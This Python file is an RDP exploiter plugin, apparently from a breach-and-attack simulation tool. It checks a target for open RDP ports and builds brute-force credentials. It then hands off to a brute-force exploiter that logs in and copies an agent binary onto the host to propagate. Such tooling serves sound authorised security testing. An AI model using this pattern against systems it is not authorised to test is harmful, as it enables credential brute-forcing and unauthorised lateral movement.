import logging
from functools import partial
from pprint import pformat
from typing import Any, Dict

from agentpluginapi import (
    ExploiterResult,
    IAgentBinaryRepository,
    IAgentCommandBuilderFactory,
    IAgentEventPublisher,
    IPropagationCredentialsRepository,
    LocalMachineInfo,
    TargetHost,
)
from monkeyevents import AgentEventTag
from monkeytypes import AgentID, Event, OperatingSystem
from plugintoolbox import BruteForceCredentialsProvider, BruteForceExploiter, get_agent_dst_path

from .rdp_command_builder import build_rdp_command
from .rdp_credentials_generator import generate_rdp_credentials
from .rdp_options import RDPOptions
from .rdp_remote_access_client import RDP_PORTS
from .rdp_remote_access_client_factory import RDPRemoteAccessClientFactory

logger = logging.getLogger(__name__)


def should_attempt_exploit(host: TargetHost) -> bool:
    return not set(RDP_PORTS).issubset(host.ports_status.tcp_ports.closed)


class Plugin:
    def __init__(
        self,
        *,
        plugin_name: str,
        agent_id: AgentID,
        agent_event_publisher: IAgentEventPublisher,
        agent_binary_repository: IAgentBinaryRepository,
        propagation_credentials_repository: IPropagationCredentialsRepository,
        local_machine_info: LocalMachineInfo,
        agent_command_builder_factory: IAgentCommandBuilderFactory,
        **kwargs,
    ):
        self._plugin_name = plugin_name
        self._agent_id = agent_id
        self._agent_event_publisher = agent_event_publisher
        self._agent_binary_repository = agent_binary_repository
        self._propagation_credentials_repository = propagation_credentials_repository
        self._local_machine_info = local_machine_info
        self._agent_command_builder_factory = agent_command_builder_factory

    def run(
        self,
        *,
        host: TargetHost,
        options: Dict[str, Any],
        interrupt: Event,
        **kwargs,
    ) -> ExploiterResult:
        try:
            logger.debug(f"Parsing options: {pformat(options)}")
            rdp_options = RDPOptions(**options)
        except Exception as err:
            msg = f"Failed to parse RDP options: {err}"
            logger.exception(msg)
            return ExploiterResult(error_message=msg)

        if not should_attempt_exploit(host):
            msg = f"Host {host.ip} has no open RDP ports"
            logger.debug(msg)
            return ExploiterResult(
                exploitation_success=False, propagation_success=False, error_message=msg
            )

        rdp_command_builder = partial(
            build_rdp_command,
            agent_command_builder=(
                self._agent_command_builder_factory.create_windows_agent_command_builder()
            ),
        )
        rdp_remote_access_client_factory = RDPRemoteAccessClientFactory(
            host,
            rdp_options,
            rdp_command_builder,
        )
        running_from_windows = self._local_machine_info.operating_system == OperatingSystem.WINDOWS
        credentials_generator = partial(
            generate_rdp_credentials,
            domains=rdp_options.domains,
            running_from_windows=running_from_windows,
        )
        credentials_provider = BruteForceCredentialsProvider(
            self._propagation_credentials_repository, credentials_generator
        )
        brute_force_exploiter = BruteForceExploiter(
            self._plugin_name,
            self._agent_id,
            get_agent_dst_path(host),
            rdp_remote_access_client_factory,
            credentials_provider,
            self._agent_binary_repository,
            self._agent_event_publisher,
            {AgentEventTag("rdp-exploiter")},
        )

        try:
            logger.debug(f"Running RDP exploiter on host {host.ip}")
            return brute_force_exploiter.exploit_host(host, interrupt)
        except Exception as err:
            msg = f"An unexpected exception occurred while attempting to exploit host: {err}"
            logger.exception(msg)
            return ExploiterResult(error_message=msg)
